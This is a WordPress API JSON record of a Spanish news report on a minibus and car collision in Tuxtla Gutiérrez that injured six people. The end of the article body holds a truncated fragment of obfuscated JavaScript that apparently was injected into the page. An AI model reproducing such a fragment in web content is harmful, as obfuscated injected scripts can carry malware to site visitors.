{"id":5973,"date":"2022-10-20T02:22:17","date_gmt":"2022-10-20T02:22:17","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5973"},"modified":"2022-10-20T02:22:18","modified_gmt":"2022-10-20T02:22:18","slug":"seis-heridos-deja-colectivazo-en-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5973","title":{"rendered":"Seis heridos deja colectivazo en Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"766\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221019-WA0051-1024x766.jpg\" alt=\"\" class=\"wp-image-5974\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221019-WA0051-1024x766.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221019-WA0051-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221019-WA0051-768x575.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/10\/IMG-20221019-WA0051.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 19 de octubre del 2022. Tuxtla Guti\u00e9rrez. Tuxtla Guti\u00e9rrez.- El choque entre una unidad de transporte p\u00fablico en la modalidad de colectivo y un particular en la Prolongaci\u00f3n de la Quinta Norte a la altura de plaza Las Am\u00e9ricas dej\u00f3 un saldo de seis personas heridas.<\/p>\n\n\n\n<p>Este accidente ocurri\u00f3 este mi\u00e9rcoles por la tarde cuando la Urvan de la ruta 35 con n\u00famero econ\u00f3mico 44 que circulaba en el Carril de Poniente a Oriente cuando el Chevrolet Malib\u00fa de color negro gir\u00f3 en U generado corte de circulaci\u00f3n.<\/p>\n\n\n\n<p>Por esta maniobra el colectivo se impact\u00f3 de lleno y por el golpe, cuatro adultos y dos menores resultaron heridos.<\/p>\n\n\n\n<p>Al lugar arribaron param\u00e9dicos de la Cruz Roja atendieron a los heridos que resultaron con lesiones menores.<\/p>\n\n\n\n<p>En el lugar los dos conductores llegaron a un acuerdo econ\u00f3mico para garantizar la reparaci\u00f3n de los da\u00f1os materiales y de los heridos.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 19 de octubre del 2022. Tuxtla Guti\u00e9rrez. Tuxtla Guti\u00e9rrez.- El choque entre una unidad de transporte p\u00fablico en la modalidad de colectivo y un particular en la Prolongaci\u00f3n de la Quinta Norte a la altura de plaza Las Am\u00e9ricas dej\u00f3 un saldo de seis personas heridas. Este accidente ocurri\u00f3 este mi\u00e9rcoles &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5974,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-5973","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5973","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5973"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5973\/revisions"}],"predecessor-version":[{"id":5975,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5973\/revisions\/5975"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5974"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5973"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5973"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5973"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}